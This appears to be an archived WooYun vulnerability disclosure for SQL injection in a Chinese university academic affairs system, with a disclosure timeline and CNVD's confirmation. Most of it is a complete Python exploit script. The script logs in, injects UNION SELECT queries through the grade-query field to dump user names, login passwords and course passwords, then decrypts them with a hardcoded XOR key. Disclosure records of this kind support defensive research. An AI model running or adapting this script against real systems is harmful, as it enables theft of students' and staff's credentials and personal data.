乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-01-10: 细节已通知厂商并且等待厂商处理中 2013-01-14: 厂商已经确认,细节仅向厂商公开 2013-01-24: 细节向核心白帽子及相关领域专家公开 2013-02-03: 细节向普通白帽子公开 2013-02-13: 细节向实习白帽子公开 2013-02-24: 细节向公众公开
可以插入任意SQL语句
#! /usr/bin/env python# coding=utf-8import sysimport requestsurl_root = 'http://***.com/'url_login = ''url_query = ''cookie = {}def help(): print 'Usage : ', sys.argv[0], 'user' def login(): global cookie r = requests.get(url_root) t = r.headers['set-cookie'].split(';')[0].split('=') cookie[t[0]] = t[1] postdata = {} t = r.content[r.content.find('__VIEWSTATE') + 20:] t = t[:t.find('"')] postdata['__VIEWSTATE'] = t postdata['TextBox1'] = '****' postdata['TextBox2'] = '****' postdata['Button1'] = '' postdata['Button2'] = '' postdata['RadioButtonList1'] = '学生'.decode('utf-8').encode('gbk') r = requests.post(url_login, cookies=cookie, data=postdata) if len(r.history) == 0: print '登陆失败' sys.exit()def query(sql): global url_query, cookie result = [] header = {} header['Referer'] = url_root header['Host'] = '****' r = requests.get(url_query, cookies=cookie, headers=header) t = r.content.decode('gbk').encode('utf-8') t = t[t.find('__VIEWSTATE')+20:] t = t[:t.find('"')] postdata = {} postdata['__VIEWSTATE'] = t postdata['Dropdownlist5'] = '' postdata['Dropdownlist3'] = 'a.xh' postdata['Dropdownlist4'] = '' postdata['Dropdownlist1'] = '' postdata['Dropdownlist2'] = '' postdata['Button5'] = '查 询'.decode('utf-8').encode('gbk') postdata['TextBox1'] = sql r = requests.post(url_query, data=postdata, cookies=cookie, headers=header) t = r.content.decode('gbk').encode('utf-8') t = t[t.find('Dropdownlist4">')+15:] t = t[:t.find('</select>')] while True: pos = t.find('">') if pos == -1: break t = t[pos + 2:] x = t[:t.find('</option>')] t = t[t.find('</option>') + 9:] result.append(x) return resultdef main(): global url_root, url_login, url_query url_login = url_root + 'default2.aspx' url_query = url_root + 'cjcx.aspx?xh=****'# + sys.argv[2] login() xm = query("888888' union select yhm||xm yhm,xm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) yhm = query("888888' union select yhm||yhm yhm,yhm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) jsmm = query("888888' union select yhm||jsmm yhm,jsmm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) jskcmm = query("888888' union select yhm||jskcmm yhm,jskcmm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) print '' print '%-12s%-13s%-16s%-16s' % ('姓名', '用户名', '登录密码', '课程密码') print '--------------------------------------------------------' for i in range(len(xm)): xm[i] = xm[i][5:] yhm[i] = yhm[i][5:] jsmm[i] = jsmm[i][5:] jskcmm[i] = jskcmm[i][5:] if len(xm[i]) == 6: xm[i] = xm[i][:3] + ' ' + xm[i][3:] jskcmm[i] = decode(jskcmm[i]) else: yhm[i] = ' ' + yhm[i] jsmm[i] = ' ' + jsmm[i] jskcmm[i] = ' ' + decode(jskcmm[i]) print '%-12s%-10s%-16s%-16s' % (xm[i], yhm[i], jsmm[i], jskcmm[i]) print '' def decode(src): key = 'Encrypt01' str3 = '' num3 = 0 num4 = len(src) if len(src) % 2 == 0: str4 = src[:num4/2] str4 = str4[::-1] str5 = src[num4/2:] str5 = str5[::-1] src = str4 + str5 for i in range(num4): str6 = src[i:i+1] str2 = key[num3:num3+1] if ((ord(str6[0]) ^ ord(str2[0])) < 0x20) or ((ord(str6[0]) ^ ord(str2[0])) > 0x7E) or (ord(str6[0]) < 0) or (ord(str6[0]) > 0xFF): str3 = str3 + str6 else: str3 = str3 + str(chr(ord(str6[0]) ^ ord(str2[0]))) num3 = num3 + 1 if num3 == len(key): num3 = 0 return str3if __name__ == '__main__': if len(sys.argv) != 2: help() sys.exit() main()
过滤
危害等级:高
漏洞Rank:14
确认时间:2013-01-14 20:32
CNVD确认漏洞情况,同时CNVD已着手对近期白帽子报送的与正方教务系统相关的所有漏洞进行重新汇总验证,提交软件生产厂商,取得更好的处置效果。rank 14
暂无